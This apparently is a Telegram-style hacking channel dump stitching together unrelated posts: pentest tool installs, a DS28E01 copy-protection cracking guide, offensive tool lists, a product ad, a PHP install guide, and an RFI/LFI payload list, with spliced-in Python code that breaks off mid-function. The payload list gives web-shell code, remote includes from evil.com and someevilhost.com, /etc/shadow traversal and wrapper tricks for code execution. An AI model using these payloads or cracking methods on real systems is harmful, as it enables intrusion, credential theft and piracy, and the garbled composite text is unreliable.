UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ The world's first platform that collects & analyzes every new hacking method.
+ AI practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help

🦑 2020: Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
twitter.com/undercodeNews :

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) git clone https://github.com/leebaird/discover /opt/discover/
All scripts must be run from this location.

2) cd /opt/discover/

3) ./update.sh

API key locations:

recon-ng
show keys
keys add bing_api <value>

theHarvester
/opt/theHarvester/api-keys.yaml


🦑 RECON
1. Domain
2. Person
3. Parse salesforce

🦑 SCANNING
4. Generate target list
5. CIDR
6. List
7. IP, range, or domain
8. Rerun Nmap scripts and MSF aux

🦑 WEB
9. Insecure direct object reference
10. Open multiple tabs in Firefox
11. Nikto
12. SSL

🦑 MISC
13. Parse XML
14. Generate a malicious payload
15. Start a Metasploit listener



@UnderCodeOfficial

🦑 2020 updated: A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
fb.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) git clone https://github.com/codingo/Reconnoitre.git
After you have done this run setup.py with the following:

2) python3 setup.py install

3) After setup has run, Reconnoitre will be in your path (as reconnoitre) and you can launch it from anywhere using:

reconnoitre <args>

🦑 -h, --help Display help message and exit
-t TARGET_HOSTS Set either a target range of addresses or a single host to target. May also be a file containing hosts.
-o OUTPUT_DIRECTORY Set the target directory where results should be written.
-w WORDLIST Optionally specify your own wordlist to use for pre-compiled commands, or executed attacks.
--pingsweep Write a new target.txt file in the OUTPUT_DIRECTORY by performing a ping sweep and discovering live hosts.
--dns, --dnssweep Find DNS servers from the list of target(s).
--snmp Find hosts responding to SNMP requests from the list of target(s).
--services Perform a service scan over the target(s) and write recommendations for further commands to execute.
--hostnames Attempt to discover target hostnames and write to hostnames.txt.
--virtualhosts Attempt to discover virtual hosts using the specified wordlist. This can be extended via discovered hostnames.
--ignore-http-codes Comma separated list of http codes to ignore with virtual host scans.
--ignore-content-length Ignore content lengths of the specified amount. This may become useful when a server returns a static page on every virtual host guess.
--quiet Suppress banner and headers and limit feedback to grepable results.
--quick Move to the next target after performing a quick scan and writing first-round recommendations.
--no-udp Disable UDP service scanning, which is ON by default.


@UnderCodeOfficial
🦑 Enjoy all these 2020 tools - tested & most popular - use them to learn.

🦑 STM32 series BIN file to C source code, by undercode
fb.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) It has always been impossible for ordinary development engineers to convert .BIN or .ASM files back into C files. From the perspective of the chip-decryption reverse-engineering industry, however, it is completely achievable. The reverse engineers must have sufficient development experience and a sufficient understanding of the STM32 series microcontrollers.

2) The binary BIN file is extracted by chip decryption and then converted into a C language file. Once the customer has the source code, they can carry out secondary development and modification.

3) Our usual procedure is as follows:

> Step 1: Decrypt the chip and obtain the binary BIN file.

> Step 2: Convert the BIN file into a disassembly file. The assembly file is also a program file, but few engineers can read it nowadays.

> Step 3: Write the C language version based on the disassembled file, as we do at undercode. This is edited line by line by the engineer and is very time consuming. The entire cycle is about 30 days (depending on the file size; calculated for a typical 100K file).

> Step 4: Debug against the prototype provided by the customer. Once debugging is OK, the customer confirms.

4) Throughout the project, the customer must provide samples for debugging. After everything is completed,

> we generate a BIN in front of the customer and burn it into the product for customer testing, to ensure that the source code we provide is authentic and reliable.

written by undercode

🦑 Detailed DS28E01 typical applications and cracking methods
pinterest.com/undercode_testing

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) The DS28E01 is generally used for copy protection, to prevent products from being easily cloned and pirated.

2) Brief introduction of DS28E01:

> The DS28E01 communicates with the MCU over a single-wire (1-Wire) bus. There is not much to say about the bus itself: its timing is very strict, accurate to the microsecond (us) level.

3) DS28E01 has four memory areas:

Data Memory (EEPROM) (4 pages, 32 bytes per page)

Key memory (secret) (8 bytes)

Register page with specific functions and user bytes

Volatile scratchpad (8 bytes)


4) The MCU can only read and write the scratchpad over the bus; it cannot read or write the other storage areas directly.

5) When writing data to the data memory, loading the initial key, or writing data to the register page, the data is first written to the scratchpad, and then the corresponding command instructs the chip to copy the data from the scratchpad to the destination address.

🦑 Working principle:

> There is a SHA-1 (160-bit) engine inside the chip, which runs the SHA algorithm over 55 bytes of data in a specific format.

> The data consists of the 8-byte key, a 5-byte user-specified random number, the 32-byte EEPROM page content, the 7-byte ROMID, 2 bytes of fixed data (0xFF), and the 1-byte EEPROM address TA1.

> The MCU reads the 20-byte hash value computed by the chip's SHA engine and compares it with the hash value it computes itself using the same algorithm.

> Since the MCU has to perform the same computation, it must be able to assemble exactly the same 55-byte message as the chip does internally. Where does each part come from?

> The 8-byte key: generated and written by the MCU itself. -> OK

> The 5-byte random number: the value written into the scratchpad before the chip performs the SHA. -> OK

> The 32-byte EEPROM data: before returning the 20-byte hash value, the chip returns the 32-byte page content. -> OK

> The 7-byte ROMID: the chip's ROMID can be read at any time. -> OK

> The 2-byte fixed value: given in the datasheet. -> OK

> The 1-byte TA1: written by the MCU itself. -> OK

🦑 Typical application process:

Process 1: Initialize the DS28E01 key

The key is initialized only once, at the factory before the product is manufactured.

Procedure flow chart:

1) Read the chip ROMID

2) Generate a unique 64-bit key through some algorithm, so that the key generated for each board is different.

3) Write the key to the chip's scratchpad and read it back to verify that it was written correctly

4) Execute the chip's load-key command so the chip saves the 64-bit key from the scratchpad into the key storage area

5) Done.

🦑 Process 2: Verify the DS28E01 key

1) Key verification is performed in the product application. Every time the product starts, it verifies that the DS28E01 key is correct.

2) If verification passes, the product runs normally. If verification fails, the product is made to work abnormally by some means.

🦑 Procedure flow chart:

1) Read the chip ROMID

2) Generate the 64-bit key with the same algorithm as in the initialization process

3) Write an 8-byte random number to the chip's scratchpad (only 5 bytes are used), and read it back to verify

4) Send the authentication command to the chip, which returns the 32 bytes of EEPROM data and the 20-byte hash value

5) Use the data read above to assemble the 55-byte message and perform the SHA-1 operation

6) Compare the hash value computed by the MCU with the hash value read back from the chip
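The verification flow above (Process 2, steps 1 to 6) run against a simulated chip, as an added example that is not code from the original post or from the chip vendor. The six field sizes (8+5+32+7+2+1 = 55) are the post's; the field order inside the message, the HMAC-based key derivation, the SimulatedDS28E01 class and the ROMID/CPUID values are assumptions constructed for the example.

```python
import hashlib
import hmac
import secrets

# Field sizes from the post: 8 + 5 + 32 + 7 + 2 + 1 = 55 bytes.
KEY_LEN, CHALLENGE_LEN, PAGE_LEN, ROMID_LEN, MESSAGE_LEN = 8, 5, 32, 7, 55
FIXED_BYTES = b"\xff\xff"        # the post's "2-byte fixed data (0xFF)"

# Constructed product-wide secret. It has to live in MCU firmware, which is
# why the post's "cracking method" starts by dumping the MCU's binary.
MASTER_SECRET = bytes.fromhex("8f1c2b3a4d5e6f708192a3b4c5d6e7f8")


def derive_device_key(romid, cpuid, master=MASTER_SECRET):
    """Process 1 step 2 / Process 2 step 2: a 64-bit key bound to ROMID and CPUID.
    HMAC-SHA-256 truncated to 8 bytes is an assumed derivation, not the post's."""
    if len(romid) != ROMID_LEN:
        raise ValueError("ROMID must be %d bytes" % ROMID_LEN)
    return hmac.new(master, romid + cpuid, hashlib.sha256).digest()[:KEY_LEN]


def build_message(key, challenge, page, romid, ta1):
    """Assemble the 55-byte SHA-1 input from the six parts the post enumerates.
    The field ORDER is an assumption; take the real layout from the datasheet."""
    for name, val, n in (("key", key, KEY_LEN), ("challenge", challenge, CHALLENGE_LEN),
                         ("page", page, PAGE_LEN), ("romid", romid, ROMID_LEN)):
        if len(val) != n:
            raise ValueError("%s must be %d bytes, got %d" % (name, n, len(val)))
    msg = key + challenge + page + romid + FIXED_BYTES + bytes([ta1 & 0xFF])
    if len(msg) != MESSAGE_LEN:
        raise RuntimeError("message is %d bytes, expected %d" % (len(msg), MESSAGE_LEN))
    return msg


def sha1_mac(key, challenge, page, romid, ta1):
    """The 20-byte hash both sides compute over the same 55-byte message."""
    return hashlib.sha1(build_message(key, challenge, page, romid, ta1)).digest()


class SimulatedDS28E01:
    """Constructed stand-in for the chip: 7-byte ROMID, 8-byte secret, one 32-byte
    EEPROM page and an 8-byte scratchpad, the only area the MCU writes directly."""

    def __init__(self, romid, page):
        self.romid = bytes(romid)
        self.page = bytes(page)
        self.secret = bytes(KEY_LEN)          # unprovisioned: all zeros
        self.scratchpad = bytes(8)

    def read_romid(self):
        return self.romid

    def write_scratchpad(self, data):
        self.scratchpad = bytes(data[:8])

    def read_scratchpad(self):
        return self.scratchpad

    def load_first_secret(self):
        """Process 1 step 4: copy the scratchpad into the (never readable) key area."""
        self.secret = self.scratchpad[:KEY_LEN]

    def read_authenticated_page(self, ta1):
        """Process 2 step 4: return the page plus the MAC over the 5-byte challenge."""
        challenge = self.scratchpad[:CHALLENGE_LEN]
        return self.page, sha1_mac(self.secret, challenge, self.page, self.romid, ta1)


def factory_provision(chip, cpuid):
    """Process 1, run once at the factory: derive, write, read back, load."""
    key = derive_device_key(chip.read_romid(), cpuid)
    chip.write_scratchpad(key)
    if chip.read_scratchpad() != key:                  # step 3 read-back check
        raise RuntimeError("scratchpad read-back mismatch")
    chip.load_first_secret()


def mcu_verify(chip, cpuid, ta1=0x00):
    """Process 2, run at every boot. True only if the chip's MAC matches ours."""
    romid = chip.read_romid()                                   # step 1
    key = derive_device_key(romid, cpuid)                       # step 2
    nonce = secrets.token_bytes(8)                              # step 3: 8 written, 5 used
    chip.write_scratchpad(nonce)
    if chip.read_scratchpad() != nonce:
        return False
    page, chip_mac = chip.read_authenticated_page(ta1)          # step 4
    expected = sha1_mac(key, nonce[:CHALLENGE_LEN], page, romid, ta1)   # step 5
    return hmac.compare_digest(expected, chip_mac)              # step 6, constant time


def demo():
    """A provisioned chip passes; a clone with the same EEPROM page but another
    ROMID (and no way to read the secret) fails. ROMID/CPUID values are constructed."""
    cpuid = bytes.fromhex("deadbeef00112233")
    genuine = SimulatedDS28E01(bytes.fromhex("01a2b3c4d5e6f7"), bytes(range(32)))
    factory_provision(genuine, cpuid)
    clone = SimulatedDS28E01(bytes.fromhex("01000000aa55ff"), genuine.page)
    return mcu_verify(genuine, cpuid), mcu_verify(clone, cpuid)


if __name__ == "__main__":
    print(demo())   # (True, False)
```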


🦑 Cracking method:

From the above application process, we can see that the key algorithm here is SHA-1, and there are two copies of the data that go into the SHA computation. One is inside the chip, and we cannot read it.
The other copy, however, is generated inside the MCU, so as long as the process by which the MCU generates the message can be obtained, cracking is possible.

The critical data is the 8-byte key, because the 8-byte key is generally bound to the ROMID and the CPUID.

Therefore, the program's binary code must first be read out of the MCU, and then the key-generation algorithm must be disassembled and analyzed to achieve the crack.

However, disassembling and analyzing the algorithm is not easy.

written by undercode
🦑 Last two tutorials for hackers with a little bit of experience :)

🦑 Best Docker images + tools I found at a random git link - the most popular hacking tools
for penetration testing, latest:
fb.com/UnderCodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

docker pull kalilinux/kali-linux-docker official Kali Linux
>https://hub.docker.com/r/kalilinux/kali-linux-docker/

docker pull owasp/zap2docker-stable - official OWASP ZAP
>https://github.com/zaproxy/zaproxy

docker pull wpscanteam/wpscan - official WPScan
> https://hub.docker.com/r/wpscanteam/wpscan/

docker pull pandrew/metasploit - docker-metasploit
> https://hub.docker.com/r/pandrew/metasploit/

docker pull citizenstig/dvwa - Damn Vulnerable Web Application (DVWA)
> https://hub.docker.com/r/citizenstig/dvwa/

docker pull wpscanteam/vulnerablewordpress - Vulnerable WordPress Installation
> https://hub.docker.com/r/wpscanteam/vulnerablewordpress/

docker pull hmlio/vaas-cve-2014-6271 - Vulnerability as a service: Shellshock
> https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/

docker pull hmlio/vaas-cve-2014-0160 - Vulnerability as a service: Heartbleed
> https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/

docker pull opendns/security-ninjas - Security Ninjas
> https://hub.docker.com/r/opendns/security-ninjas/


http://www.xss-payloads.com/ XSS Payloads to leverage XSS vulnerabilities, build custom payloads, practice penetration testing skills.
https://github.com/joaomatosf/jexboss JBoss (and other Java deserialization vulnerabilities) verify and exploitation tool
https://github.com/commixproject/commix Automated all-in-one OS command injection and exploitation tool
https://github.com/pathetiq/BurpSmartBuster A Burp Suite content discovery plugin that adds the smart into the Buster!
https://github.com/GoSecure/csp-auditor Burp and ZAP plugin to analyze CSP headers
https://github.com/ffleming/timing_attack Perform timing attacks against web applications
https://github.com/lalithr95/fuzzapi Fuzzapi is a tool used for REST API pentesting
https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF)
https://github.com/nccgroup/wssip Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa.
https://github.com/tijme/angularjs-csti-scanner Automated client-side template injection (sandbox escape/bypass) detection for AngularJS (ACSTIS).
https://reshift.softwaresecured.com A source code analysis tool for detecting and managing Java security vulnerabilities.
https://encoding.tools Web app for transforming binary data and strings, including hashes and various encodings. GPLv3 offline version available.
https://gchq.github.io/CyberChef/ A "Cyber Swiss Army Knife" for carrying out various encodings and transformations of binary data and strings.
https://github.com/urbanadventurer/WhatWeb WhatWeb - Next generation web scanner
https://www.shodan.io/ Shodan - The search engine for finding vulnerable servers
https://github.com/WangYihang/Webshell-Sniper A webshell manager via terminal

@UnderCodeTesting

🦑 Is it necessary for an Xbox console to use an accelerator? How did the Dolphin Acceleration Box improve the Xbox? by undercode
instagram.com/UnderCodeTestingCompany

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Over the past year, the number of console players has grown rapidly, and the number of players on the Xbox, one of the three major consoles, has naturally increased significantly, reaching a level that can compete with the Sony PS4.

> Although Xbox no longer announces sales figures, citing a focus on player engagement, the online feedback from games such as Halo 5 and Gears of War 4 shows that the number of Xbox users is considerable. Besides the numbers, another noteworthy point in the online feedback is that the Xbox online network is very unstable.

2) The instability of the Xbox online network shows mainly as high latency, character lag, packet loss and high ping. Players have to wait a long time before entering a game or a match, which gives them a headache. This environment forces players to consider whether they need an Xbox accelerator.

3) An Xbox accelerator can improve the way game data is transmitted and improve network performance during Xbox games. A good Xbox accelerator makes the player's network behave very differently: the player no longer suffers from games that cannot connect, disconnections, and long matchmaking waits.

4) The first full-platform intelligent acceleration hardware, the Dolphin Acceleration Box, performs well for Xbox console acceleration. After a brief setup, players can enjoy Dolphin acceleration. The box improves results under its HTSA intelligent acceleration strategy, and players can experience the difference in the game network before and after.

5) The Dolphin Acceleration Box breaks through the limitation of NAT types, improves the P2P team-up experience, and uses intelligent acceleration methods to ensure that the in-game network stays stable and smoothly connected. It is an Xbox accelerator worth buying.

6) If you ask which Xbox accelerator is better, the Dolphin accelerator is your first choice. The Dolphin Acceleration Box is plug and play and solves poor NAT types, slow P2P matching and latency in Xbox games, so that your Xbox game network improves steadily and you enjoy a high-quality network.

Written by UnderCode

🦑 Tutorials sent in the last 24 hours:

1) 2020 optimize script, performance monitor system- speed up android...

2) 2020 TOPIC Flutter makes it easy and fast to build beautiful mobile apps + pic

3) 2020 updated Hatch is a brute force tool that is used to brute force most websites

4) 2020 Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.

5) 2020 updated A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.

6) STM32 series BIN file to C source code, by undercode

+ Leak & exploit PDF tutorial

7) Detailed DS28E01 typical applications and cracking methods

8) Is it necessary for an Xbox console to use an accelerator? How did the Dolphin Acceleration Box improve the Xbox? by undercode

Enjoy, more to come later! @UNDERCODETESTING

LOL, this is how to get many accounts with phishing. One of the undercode testing reports.

🦑 Fix common error: Network configuration - deny a secondary agent (rogue NAT gateway), full, by undercode:
fb.com/undercodeOfficial

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Because a legitimate IP (MAC and IP have been bound on Linux) was set up as a gateway, MASQUERADE allows all other users to masquerade as this legitimate IP through it, so anyone who points their gateway at it can get out.

> For example: 192.168.1.168 (00:01:02:49:19:85) has its gateway pointed at 192.168.1.254 and can get out. Now two network cards are installed on 192.168.1.168, eth0: 192.168.1.168, eth1: 10.136.14.254, configured as a NAT using MASQUERADE, so all of 10.136.14.0/24 can be disguised as 192.168.1.168 and get out through 192.168.1.254.

2) How can this situation be identified and rejected, or the IP blocked for one hour? DROP of ETH1 FORWARD to EXT-IP. Thank you gentoo, but it seems that this is not the best solution. I understand, but you don't explain it clearly (maybe it's a problem with my understanding); it would be convenient to make it clear!

3) This is a recent problem that occurred in our school. The network segment whose IP addresses are used by professionals can MASQUERADE onto the Internet through S, and all IPs on this segment are bound in /etc/ethers on gateway S, excluding the possibility of others changing their IP (of course you can change the MAC address; we don't care about that here). 10.136.14.0/24 is the segment used by all ordinary students. The problem now is that some individual computer majors add a new network card to their computer, set up a Linux, and use MASQUERADE to disguise everyone on the 10.136.14.0/24 segment as 192.168.1.X to get on the Internet.

4) As a result, many students often do things they shouldn't. So in response to this new situation, I would like to ask whether such a situation can be refused, or whether there is related commercial software.

5) Adding a network card yourself belongs to the category of physical attacks, and it is theoretically impossible to eliminate this situation. Dividing VLANs is also useless. The solution in our school is to rivet all the cases shut.

6) Only a few people have the right to open the case, and then the VLAN is divided, which works well. The IPs of the 192.168.1.0 segment are bound to MACs. The students use IPs of the 10.136.14.0/24 segment.

7) How can a student obtain an IP on the 192.168.1.0 segment? Students can't get an IP of 192.168.1.0 on this segment, so how can it be disguised? It is an IP owner on 192.168.1.0/24 who set up a Linux and then used MASQUERADE to disguise all of 10.136.14.0/24 as 192.168.1.X, so that 10.136.14.0/24 can get out. Theoretically, to prevent this situation, you need to be able to identify whether a packet is from the real 192.168.1.X or has been spoofed. But this seems to be rather difficult; someone needs to come up with a good idea.

written by undercode

🦑 Install PHP as an Apache DSO (full), by undercode
instagram.com/UnderCodeTestingCompany

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) PHP is often used with the Apache web server on Linux/Unix platforms. When you install PHP in the Apache environment, you have three installation modes to choose from: static module, dynamic module (DSO), and CGI.

2) I suggest you install PHP as an Apache DSO. This installation mode is very easy to maintain and upgrade. For example, suppose you originally installed PHP with only database support, but after a few days you decide to add encryption to PHP. Quite simply, you just type the make clean command, add the new configuration options, and then execute the make and make install commands.

3) In this way, the new PHP module is installed in the appropriate location in Apache; you just restart Apache and everything is OK. Of course, the entire process does not require recompiling Apache at all.

4) The simple steps to install a new version of Apache and PHP as an Apache DSO are as follows:

1) Download the latest version of the source code for the Apache server software from the Apache Software Foundation site.

2) Place the code file in a suitable directory such as /usr/local/ or /opt/.

3) Use the gunzip command to decompress the code file; you then get the corresponding *.tar file.

4) Type the following unpacking command to place the contents of the tar file in a directory of the form apache_[version]:

tar -xvf apache_[version].tar

5) Go to the /usr/local/apache_[version] directory (or the directory you specified in the step above).

6) Type the following configuration command, replacing the [path] parameter with the path you chose (such as /usr/local/apache[version]; be careful not to add a trailing slash!). You also need to enable the mod_so module to allow Apache to use DSOs.

./configure --prefix=[path] --enable-module=so

7) Return to the command prompt, type make, and wait for the command to finish and return to the command prompt again.

8) Type make install.

At this point, the compiler has created the final directory tree and returned you to the system command prompt.

🦑 Next, install PHP:

1) Visit the download area of the PHP homepage and select the link for the latest version of the source code.

2) Place the downloaded file in an appropriate directory such as /usr/local/ or /opt/.

3) Use the gunzip command to decompress the code file; you then get the corresponding *.tar file.

4) Type the following unpacking command to put the contents of the tar file into a directory of the form php-[version]:

tar -xvf php-[version].tar

5) Go to the /usr/local/php-[version] directory (or the directory you specified).

Now you can compile the PHP DSO. In fact, only one configuration option is required here, --with-apxs (apxs is a file in the Apache bin directory); however, for a more comprehensive system configuration, we also add MySQL database support here.

./configure --with-mysql=/[path to mysql] --with-apxs=/[path to apxs]

6) Return to the command prompt, type make, and wait until the command completes and returns to the command prompt.

7) Type the make install command.

🦑 At this point, the compiler creates the final DSO and places it in the Apache module directory. At the same time, it modifies the Apache httpd.conf configuration file for you. After that, the system returns to the command prompt and waits for new instructions. Now you can open the Apache httpd.conf configuration file to make a few corrections:

1) Find the line beginning with ServerAdmin and add your own email address, as follows:

ServerAdmin you@yourdomain.com

2) Find the line beginning with ServerName and change its parameter to the actual value, such as:

ServerName localhost

3) Find the following paragraph:

# And for PHP 4.x, use:
#
#AddType application/x-httpd-php .php
#AddType application/x-httpd-php-source .phps

Modify these configuration lines by uncommenting the AddType lines under PHP 4.x. At the same time, add the other file extensions used by PHP. The modified lines may look like this:

# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .phtml
AddType application/x-httpd-php-source .phps

Save the configuration file, return to the parent directory, and start Apache by typing:

./bin/apachectl start

🦑 If there are no problems during startup, you can test the Apache and PHP installation by creating a file called phpinfo.php containing the following line of code:

<?php phpinfo(); ?>

> Save the file and place it in the Apache document root directory (htdocs), then start your web browser and type http://localhost/phpinfo.php in the address bar. The browser displays a long page of the various variables and values of the PHP and Apache systems.

> If you want to reconfigure PHP, all you need to do is run the make clean command, then ./configure with the new configuration options, and then make and make install. In this way, a new module appears in the Apache module directory, and you just need to restart Apache to load it. Many previous headaches are now solved.

written by undercode

🦑 RFI/LFI Payload List:
fb.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) As with many exploits, remote and local file inclusions are only a problem because of how the code is written; of course, it takes a second person to take advantage of it. This article will hopefully give you an idea of how to protect your website and, most importantly, your code from a file inclusion exploit. I'll give the code examples in PHP.

2) Let's look at some of the code that makes RFI/LFI exploits possible.

<a href="index.php?page=file1.php">Files</a>
<?php
$page = $_GET['page'];
include($page);
?>

3) Now obviously this should not be used. The $page input is not sanitized at all; it is passed directly into the web page, which is a big "NO". Always sanitize any input that comes through the browser. When the user clicks on "Files" to visit files.php, the request will look something like this:

http://localhost/index.php?page=files.php

4) Now, if no one has sanitized the input in the $page variable, we can point it to whatever we want. If the site is hosted on a Unix/Linux server, we can display the password or shadow file, or configuration files, through the unsanitized variable input.

5) Viewing files on the server is a "Local File Inclusion" or LFI exploit. This is no worse than an RFI exploit.

http://localhost/index.php?page=../../../../../../etc/passwd
The code will probably return /etc/passwd. Now let's look at the RFI aspect of this exploit. Let's take the same code we used before.

<a href="index.php?page=file1.php">Files</a>
<?php
$page = $_GET['page'];
include($page);
?>

6) Now suppose we request something like …

http://localhost/index.php?page=http://google.com/
Where the $page variable was originally placed on the page, we probably get the google.com homepage. This is where the coder can be hurt. We all know what c99 (shell) can do, and if coders are careless, it may be included in the page, allowing users to browse through sensitive files and contents at will. Let's look at something simpler that can happen on a web page: the quick and dirty use of an RFI exploit. Now, create a file named "test.php", put the following code in it and save it.


<?php
passthru($_GET['cmd']);
?>

7) Now this file is something you can use to your advantage by including it on a page through the RFI exploit. The passthru() function in PHP is very evil, and many hosts disable it "for security reasons". With this code in test.php, we can send a request to the web page through the file inclusion exploit.

http://localhost/index.php?page=http://someevilhost.com/test.php
When the code makes the $_GET request, we must provide a command to pass to passthru(). We can do something like this.

8) http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd
This Unix machine will then dump the file /etc/passwd using the cat command. Now we know how to exploit RFI; next we need to know how to stop it, making it impossible for anyone to execute commands or include remote pages on your server. First, we can disable passthru(). But anything on your site can use it again (hopefully not). But this is not the only thing you can do. I suggest cleaning the inputs as I said before. Now, instead of just passing variables directly to the page, we can use a few of the functions PHP provides. Originally, chop() from Perl was adapted to PHP; it removes trailing whitespace from a string. We can use it like this.

<a href="index.php?page=file1.php">Files</a>
<?php
$page = chop($_GET['page']);
include($page);
?>

9) There are many functions that can clean a string: htmlspecialchars(), htmlentities(), stripslashes() and more. To avoid confusion, I prefer to use my own functions. We can write a function in PHP that cleans everything for you; here I've prepared something easy and quick for you.
<?php
function cleanAll($input) {
    $input = strip_tags($input);
    $input = htmlspecialchars($input);
    return $input;
}
?>
10) Now I hope you can see what's going on inside this function, so you can add your own. I would suggest using the str_replace() function, and there are a lot of other functions to clean input with. Be considerate and stop the RFI & LFI exploit frenzy!

Basic LFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
Interesting files to check out :

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the file descriptor)
/proc/self/environ
/proc/version
/proc/cmdline
Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
LFI / RFI Wrappers :
LFI wrapper rot13 and base64 - php://filter is case insensitive.

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

11) It can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
LFI Wrapper ZIP :
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php
RFI Wrapper DATA with "" payload :
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
RFI Wrapper EXPECT :
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
XSS via RFI/LFI with "" payload :
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
LFI to RCE via /proc/*/fd :
Upload a lot of shells (for example : 100)
Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be brute-forced) and $FD the file descriptor (can be brute-forced too)
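As an added defensive example (not from the original post), the following Python scans constructed access-log lines for the payload shapes listed above: traversal including the ....// variant, %00 null bytes, %252e double encoding, php://filter, zip://, data: and expect: wrappers, remote includes, and the sensitive /etc and /proc paths. The log lines and the indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache common-log-format lines reproducing the payload shapes
# listed above (traversal, %00, %252e double encoding, php://filter, zip://,
# remote include, /proc/self/environ). Not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2020:10:00:02 +0000] "GET /index.php?page=../../../../../../etc/passwd HTTP/1.1" 200 1843
10.0.0.6 - - [01/Jan/2020:10:00:03 +0000] "GET /index.php?page=../../etc/passwd%00 HTTP/1.1" 500 0
10.0.0.7 - - [01/Jan/2020:10:00:04 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1843
10.0.0.7 - - [01/Jan/2020:10:00:05 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 1843
10.0.0.8 - - [01/Jan/2020:10:00:06 +0000] "GET /index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php HTTP/1.1" 200 4120
10.0.0.8 - - [01/Jan/2020:10:00:07 +0000] "GET /index.php?page=zip://shell.jpg%23payload.php HTTP/1.1" 200 77
10.0.0.9 - - [01/Jan/2020:10:00:08 +0000] "GET /index.php?page=http://someevilhost.com/test.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 1843
10.0.0.9 - - [01/Jan/2020:10:00:09 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2020:10:00:10 +0000] "GET /index.php?page=contact.php HTTP/1.1" 200 480
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# PHP stream wrappers named above plus a few siblings; case-insensitive because
# the post shows php://filter being accepted as pHp://FilTer.
WRAPPER_RE = re.compile(r"^(php|zip|phar|data|expect|glob|compress\.zlib)\s*:", re.I)
REMOTE_RE = re.compile(r"^(https?|ftps?)://", re.I)
# The "interesting files" listed above, as they appear after decoding.
SENSITIVE_RE = re.compile(
    r"(^|/)(etc/(issue|passwd|shadow|group|hosts|motd|mysql/my\.cnf)"
    r"|proc/(self|\d+)/(environ|fd|cmdline)|proc/(version|cmdline))", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")   # also catches the '....//' variant


def indicators(value):
    """Return the indicator names triggered by one raw (still URL-encoded) value."""
    once = unquote(value)
    twice = unquote(once)            # second pass undoes %252e-style double encoding
    found = []
    if once != twice:
        found.append("double-encoding")
    if "\x00" in twice:
        found.append("null-byte")
    if TRAVERSAL_RE.search(twice):
        found.append("traversal")
    m = WRAPPER_RE.match(twice)
    if m:
        found.append("php-wrapper:" + m.group(1).lower())
    if REMOTE_RE.match(twice):
        found.append("remote-include")
    if SENSITIVE_RE.search(twice):
        found.append("sensitive-path")
    return found


def raw_params(query):
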